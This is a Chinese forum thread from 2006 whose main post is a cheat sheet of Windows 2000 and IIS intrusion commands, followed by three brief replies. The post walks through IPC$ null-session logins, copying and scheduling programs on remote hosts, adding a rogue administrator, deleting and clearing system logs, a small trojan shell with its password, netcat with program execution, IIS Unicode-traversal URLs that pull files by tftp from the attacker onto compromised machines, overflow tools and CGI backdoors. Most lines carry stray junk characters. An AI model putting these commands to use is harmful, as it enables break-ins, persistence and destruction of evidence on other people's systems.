社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3174阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 ^ALR.N+<  
常用的几条NET命令: ]N#%exBVo  
4xl}kmvv  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" jjTb:Z=.'  
v "Yo  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" id=:J7!QU  
$ KAOJc4<  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ 0^G5 zQlj  
xkPH_+4i8  
(查看远程主机时间) net time \\IP地址 JsY|Fv  
!o{>[  
(定时启动某个程序) at \\IP地址 02:18 readme.exe (;(P3h  
g=q1@)  
(查看共享) net view \\IP地址 &?wNL@n  
] l@Mo7|w  
(查看netbios工作组列表) nbtstat -A IP地址 #ts;s\!  
)^q7s&p/  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" _ !r]**  
GyP.;$NHa[  
(这两条把自己增加到管理员组): net user 用户名 密码 /add 7#G8qh<  
8 mFy9{M  
net localgroup Administrators 用户名 /add EsK.g/d  
tpQ?E<O  
(断开连接) net use \\IP地址\ipc$ /delete []#>r k~  
kbcqUE  
扫尾: m R|;}u;d  
+/|;<K5_LI  
del C:\winnt\system32\logfiles\*.* jVxX! V  
9%  wVE]  
del C:\winnt\ssytem32\config\*.evt UFOUkS F  
#@^mA{Dt5  
del C:\winnt\system32\dtclog\*.* \YN(rD-  
6_vhBYLf  
del C:\winnt\system32\*.log w15Qqh lK  
UifuRmn  
del C:\winnt\system32\*.txt _f1~r^(/T0  
9=FqI50{  
del C:\winnt\*.txt qwd7vYBc,  
M0$wTmXM  
del C:\winnt\*.log #eZm)KFQg  
[i 7^a/e  
一、netsvc.exe Zp'q;h_  
K>_~zWnc  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: Dqz9NB  
*F)+- BB  
netsvc /list \\IP地址 ]@G$ L,3  
a*GiLq  
netsvc schedule \\IP地址 /query )h>H}wDs  
~;ZT<eCIA  
netsvc \\IP地址 schedule /start QswbIP/>:'  
 gK Uci  
二、OpenTelnet.exe 5+yT{,(5  
=|Vm69  
远程启动主机的Telnet服务,并绑定端口到7878,例如: z c4l{+3  
6%Ws>H4@|  
OpenTelnet \\IP地址 用户名 密码 1 7878 qy$1+>f1  
9s9_a4t5  
然后就可以telnet到主机的7878端口,进入DOS方式下: E|`JmfLQu  
tY>_ +)oi  
telnet IP地址 7878 g6V>_|  
o / i W%  
三、winshell.exe jph"94  
G0^,@jF?b  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: -s5>GwZt  
2"IsNbWV  
p Path (查看winshell主程序的路径信息) }(-2a*Z;Y  
%<?U`o@*  
b reBoot (重新启动机器) S)L(~ N1  
 L4 )  
d shutDown (关闭机器) z!> H^v  
Z}NMDb:t  
s Shell (执行后你就会看到可爱的“C:\>”) RX6s[uQ  
x+;"(]#  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) Y [ p  
Rk(2|I  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) )Co&(;zf  
f0Zn31c^  
四、3389登陆器,GUI方式登录远程主机的 z pV+W-j]  
JA(M'&q4  
五、elsave.exe k}tT l 2  
UL<*z!y  
事件日志清除工具 oy< q;'  
}bM=)eUfX  
elsave -s \\IP地址 -l "application" -C DI,8y"!5  
!c#~g0H+  
elsave -s \\IP地址 -l "system" -C 9 %MHIY5  
S#g=;hD  
elsave -s \\IP地址 -l "security" -C ){S/h<4m  
.Km6 (U  
执行后成功清除应用程序日志,系统日志,安全日志 j 5{ "j  
-ZKo/ N>6}  
六、hbulot.exe j$Unw  
?V >{3  
开启win2kserver和winxp的3389服务 ;c;5O@R}3  
S(MVL!Lm  
hbulot [/r] x}(p\Efx  
=(%+S<}  
使用/r表示安装完成后自动重起目标使设置生效。 %hO/2u  
'"~ 2xiin  
七、nc.exe(netcat.exe) KDUa0$"  
4qe!+!#$  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 lemE/(`a_  
KBSO^<7  
想要连接到某处: nc [-options] hostname port[s] [ports] ... SIr^\iiOB  
B33H,e)  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] Y-vLEIX=  
R[Y{pT,AY  
参数: R3\oLT4  
a-(OAzQ_  
-e prog 程序重定向,一旦连接,就执行 [危险!!] HAOl&\)7"_  
v==]v2 -  
-g gateway source-routing hop point[s], up to 8 <-avC/M$d  
h|Os T  
-G num source-routing pointer: 4, 8, 12, ... WK)2/$7@  
;E0aTV)Zp  
-h 帮助信息 :^H#i:4  
c(5r  
-i secs 延时的间隔 fBZAO  
<~ 9a3c?  
-l 监听模式,用于入站连接 nPh| rW=  
ER4j=O#  
-n 指定数字的IP地址,不能用hostname $<QOMfY>  
fAHf}j  
-o file 记录16进制的传输 {T2=bK~  
fRT4,;  
-p port 本地端口号 N-cLp}D}WB  
|y}iOI  
-r 任意指定本地及远程端口 "pLWJvj6-  
B!X;T9^d  
-s addr 本地源地址 F\U^-/0,  
,ag:w<km  
-u UDP模式 V\4zK$]  
` 0}z ;&:  
-v 详细输出——用两个-v可得到更详细的内容 ;kv/(veQ1<  
[n!5!/g>j  
-w secs timeout的时间 gdKn!; ,w#  
[Kc"L+H\  
-z 将输入输出关掉——用于扫描时 &]xOjv/?  
八、TFTPD32.EXE I&lb5'6D  
^w1&A 3=6  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: `of` uB  
i=mk#.j~  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名  WPnw  
ay-M.J  
然后可以直接令文件运行: c"H59 jE  
(|kcSnF0  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 ~n<U8cm O  
x;; =+)Gg  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 dvLO#o{  
KDQqN]rg  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 Yfotq9.=+  
gZ b +m  
一、一 Xscan命令行运行参数说明: -<MA\iSP  
:\sz`p?EC  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 nz%{hMNYH  
7F!(60xY  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] k.MAX8  
oMNgyAp^  
xscan -file <主机列表文件名> <检测项目> [其他选项] &R7N^*He  
wEu"X  
其中<检测项目> 含义如下: ML9nfB^z!  
F4T}HY>nZ  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); 9f/RD?(1O  
U|2*.''+Q  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); %; 0l1X  
I]dt1iXu_{  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);  I0v$3BQ4  
iT;~0XU7F  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); [@RJ2q$  
N~/D| ?P~2  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); NrTK+6 z  
1>wQ&{  
[其他选项] 含义如下: g~#HiBgWq[  
ZM$}Xy\9  
-v: 显示详细扫描进度 FR%u1fi  
72;4  
-p: 跳过Ping不通的主机 A"$UU6Z4  
Aqp$JM >  
-o: 跳过没有检测到开放端口的主机 FdZG%N>Z  
:p6.v>s8  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 >^!qx b-  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五